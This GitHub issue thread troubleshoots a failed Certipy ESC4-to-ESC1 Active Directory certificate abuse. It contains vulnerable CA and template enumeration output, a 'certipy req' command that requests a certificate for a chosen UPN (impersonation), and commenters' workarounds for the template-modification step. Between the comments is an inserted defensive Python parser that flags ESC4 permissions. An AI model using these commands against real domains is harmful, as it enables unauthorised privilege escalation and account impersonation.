
ESC4 > ESC1 to CERTSRV_E_UNSUPPORTED_CERT_TYPE

Status: Open · breachr opened this issue 1 year ago · 6 comments

Amazing tool! But somehow I can't get this working. I'm not sure what the problem is; maybe the space in the CA name?

Certificate Authorities
  0
    CA Name                             : testa brotstube GmbH
    DNS Name                            : srv-dc01.testa.local
    Certificate Subject                 : CN=testa brotstube GmbH
    Certificate Serial Number           : <REDACTED>
    Certificate Validity Start          : 2020-03-02 08:16:41+00:00
    Certificate Validity End            : 2030-03-02 09:03:05+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Disabled
    Permissions
      Owner                             : testa.LOCAL\Administrators
      Access Rights
        ManageCertificates              : testa.LOCAL\Administrators
                                          testa.LOCAL\Domänen-Admins
                                          testa.LOCAL\Organisations-Admins
        ManageCa                        : testa.LOCAL\Administrators
                                          testa.LOCAL\Domänen-Admins
                                          testa.LOCAL\Organisations-Admins
        Enroll                          : testa.LOCAL\Authenticated Users
    [!] Vulnerabilities
      ESC6                              : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
      ESC11                             : Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : Exchange-SHA256-5y
    Display Name                        : Exchange-SHA256-5y
    Certificate Authorities             : testa brotstube GmbH
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16777216
                                          65536
                                          ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : testa.LOCAL\Administrator
        Full Control Principals         : testa.LOCAL\Authenticated Users
        Write Owner Principals          : testa.LOCAL\Authenticated Users
        Write Dacl Principals           : testa.LOCAL\Authenticated Users
        Write Property Principals       : testa.LOCAL\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : 'testa.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'testa.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
      ESC3                              : 'testa.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
      ESC4                              : 'testa.LOCAL\\Authenticated Users' has dangerous permissions


certipy req -u [email protected] -p passw0rd -ca 'testa brotstube GmbH' -template Exchange-SHA256-5y -upn [email protected] -debug

Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'SRV-DC01.testa.LOCAL' at '172.16.10.2'
[+] Resolved 'SRV-DC01.testa.LOCAL' from cache: 172.16.10.1
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.16.10.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.16.10.1[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA.
[*] Request ID is 383

find had some problems as well, but got me the templates and CA info in the end:

[*] Trying to get CA configuration for 'testa brotstube GmbH' via CSRA
[!] Got error while trying to get CA configuration for 'testa brotstube GmbH' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'testa brotstube GmbH' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'testa brotstube GmbH'

breachr avatar Dec 15 '23 00:12 breachr
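As an added example (not code from the issue or from Certipy itself), a small parser for the "Certificate Templates" section of certipy find output that recomputes the ESC4 finding from the Object Control Permissions, which is the check an AD CS owner would run to list which templates let low-privileged principals rewrite the template object. The sample text is constructed in the layout shown above; the LOW_PRIV group names are an assumption about what counts as low-privileged.

```python
import re

# Constructed excerpt in the layout of `certipy find` output (not real data): the
# ESC4 DACL from the issue above, plus a second, locked-down template for contrast.
SAMPLE = r"""
Certificate Templates
  0
    Template Name                       : Exchange-SHA256-5y
    Permissions
      Object Control Permissions
        Full Control Principals         : testa.LOCAL\Authenticated Users
        Write Dacl Principals           : testa.LOCAL\Authenticated Users
  1
    Template Name                       : Locked-Down
      Object Control Permissions
        Full Control Principals         : testa.LOCAL\Domänen-Admins
                                          testa.LOCAL\Organisations-Admins
        Write Dacl Principals           : testa.LOCAL\Domänen-Admins
"""
KV = re.compile(r"^\s+(\S[^:]*?)\s+:\s*(.*)$")  # "    Key    : value"
INDEX = re.compile(r"^  \d+$")                  # "  0": entry index at indent 2
DANGEROUS = ("Full Control Principals", "Write Owner Principals",
             "Write Dacl Principals", "Write Property Principals")
LOW_PRIV = ("Authenticated Users", "Domain Users", "Domain Computers", "Everyone")

def parse_templates(text: str) -> list[dict[str, list[str]]]:
    """One dict per template; wrapped multi-value fields become lists."""
    templates, last_key, col = [], None, 0
    for line in text.split("Certificate Templates", 1)[-1].splitlines():
        m = KV.match(line)
        if INDEX.match(line):                     # new template entry
            templates.append({})
            last_key = None
        elif m and templates:                     # "Key : value" line
            last_key, col = m.group(1).strip(), m.start(2)
            templates[-1][last_key] = [m.group(2).strip()]
        elif last_key and len(line) > col and not line[:col].strip():
            templates[-1][last_key].append(line[col:].strip())  # wrapped value
        else:
            last_key = None                       # blank line or bare sub-header
    return templates

def esc4_principals(tpl: dict[str, list[str]]) -> list[str]:
    """Low-privileged principals that can rewrite the template object (ESC4)."""
    found: list[str] = []
    for right in DANGEROUS:
        for principal in tpl.get(right, []):
            if principal.split("\\")[-1] in LOW_PRIV and principal not in found:
                found.append(principal)
    return found
```

Any template for which esc4_principals returns a non-empty list needs its DACL reduced to the CA administrators before it is safe, regardless of which ESC1/ESC2/ESC3 settings it currently has.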

This is mostly because the certificate template you are using is not enabled. Run the certipy find command again with -enabled to get only enabled certificates.

at0mman avatar Jan 11 '24 11:01 at0mman

Thanks for the reply, but it says:

Enabled                             : True

Doesn't that mean it's enabled?

breachr avatar Jan 11 '24 11:01 breachr

Had a similar issue; for me it was an error with how certipy changed the certificate. Try to request the cert manually through the UI, if you have access to a domain-joined computer, to see what exactly the error is.

If you do not have access: in my case I could not select a CSP, so something was wrong there.

What I did was: make a copy of the old cert template, run the ESC4 command again (to export the changed template), and then edit the CSP field back to the original one. Then use the command that would be used to restore the backup, with the edited file. For me it worked, because a CSP was selected afterwards and I could proceed.

h4ckd0tm3 avatar Jan 24 '24 13:01 h4ckd0tm3

Thanks a lot for the response! Sounds like that could work. I will have access to this system in some months and will re-test it then and report back!

breachr avatar Jan 26 '24 00:01 breachr

Same issue. Also, when I tried on the Windows side, from a domain-joined computer, through certmgr, I received the following error: An error occurred while enrolling for a certificate. A certificate request could not be created. Url: test.local\test-ca Error: No provider was specified for the store or object (CRYPT_E_NO_PROVIDER). It could have something to do with the CSP, but how can that be specified?

mkannan22 avatar Feb 14 '24 17:02 mkannan22